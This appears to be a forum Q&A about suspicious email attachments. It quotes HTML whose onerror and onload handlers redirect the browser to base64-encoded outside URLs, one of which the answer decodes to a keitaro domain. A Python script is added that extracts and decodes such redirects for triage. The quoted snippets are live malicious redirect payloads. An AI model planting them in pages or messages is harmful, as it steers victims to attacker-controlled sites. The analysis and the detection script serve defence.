
JS Virus in mail?


I receive emails with some xhtml files. I find these files to be suspicious. They contain JS code:

<video src="123" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));">

<img src="awbdsdrDYZZZCN33.jpg" onerror="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MzEyNjg4ODA3NjM3Mzc1NzEg');">  

<body onload="document.location.replace(window.atob('aHR0cDovL3J1c25nLnByby80d1FKZEQ/NTU2MzQ2NzY1MzIwNjI1MSA='));" />

<link rel="stylesheet" type="text/css" href="1.css" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NDg0NDUwNTc4NzAxMjMyIA=='));" />

<body onload="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MTE1MzQ1MDI0NTExMDQ2NzM0NCA=');" />

I am wondering how malicious this code is. And what do these files do to the OS?


Solution

  • It redirects you to http://keitaro0001.pro/DcLtdS?7324243812487758.

    It purposefully uses an incorrect src property to fire the error event (since the file at that source does not exist), executing the JS in the onerror attribute:

    document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));

    The string in question is base64 encoded. window.atob decodes the base64 encoded string (which is the URL above) and assigns it to the URL.
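A way to triage attachments like this without rendering them, as an added example that is not part of the question or the answer: a small Python script (names such as find_redirects and HANDLER_ATTRS are my own) that parses the HTML, pulls the JavaScript out of onerror/onload attributes, and decodes any window.atob() argument that feeds a document.location sink, so the redirect target is visible before anyone opens the file. The sample input reuses the first snippet from the question plus a constructed harmless tag to show it is not flagged.

```python
import base64
import binascii
import re
from html.parser import HTMLParser

# Event-handler attributes the attachment abuses to run script without a <script> tag.
HANDLER_ATTRS = {"onerror", "onload"}
# Matches window.atob('<base64>') or atob("<base64>").
ATOB_RE = re.compile(r"""atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
# Navigation sinks that turn the decoded string into a redirect.
REDIRECT_RE = re.compile(r"document\.location(\.href\s*=|\.replace\()")


class HandlerScanner(HTMLParser):
    """Collect (tag, attribute, handler_js) for every event-handler attribute."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag names; it also routes <body ... /> here.
        for name, value in attrs:
            if name.lower() in HANDLER_ATTRS and value:
                self.handlers.append((tag, name.lower(), value))


def decode_atob(b64):
    """Decode like window.atob (bytes -> Latin-1 text); None if not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def find_redirects(html):
    """Return findings (tag, attr, decoded target URL) for atob-fed redirects."""
    scanner = HandlerScanner()
    scanner.feed(html)
    findings = []
    for tag, attr, js in scanner.handlers:
        if not REDIRECT_RE.search(js):
            continue  # handler does not navigate anywhere; not the pattern in question
        for b64 in ATOB_RE.findall(js):
            url = decode_atob(b64)
            if url is not None:
                findings.append({"tag": tag, "attr": attr, "target": url.strip()})
    return findings


# Constructed sample: the question's first snippet plus a harmless onerror handler.
SAMPLE = """
<video src="123" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));">
<img src="logo.png" onerror="this.style.display='none'">
"""

if __name__ == "__main__":
    for f in find_redirects(SAMPLE):
        print(f"{f['tag']}@{f['attr']} redirects to {f['target']}")
```

Running it on the sample reports only the video tag, with the same URL the answer gives; the trailing space hidden in the base64 payload is stripped from the reported target.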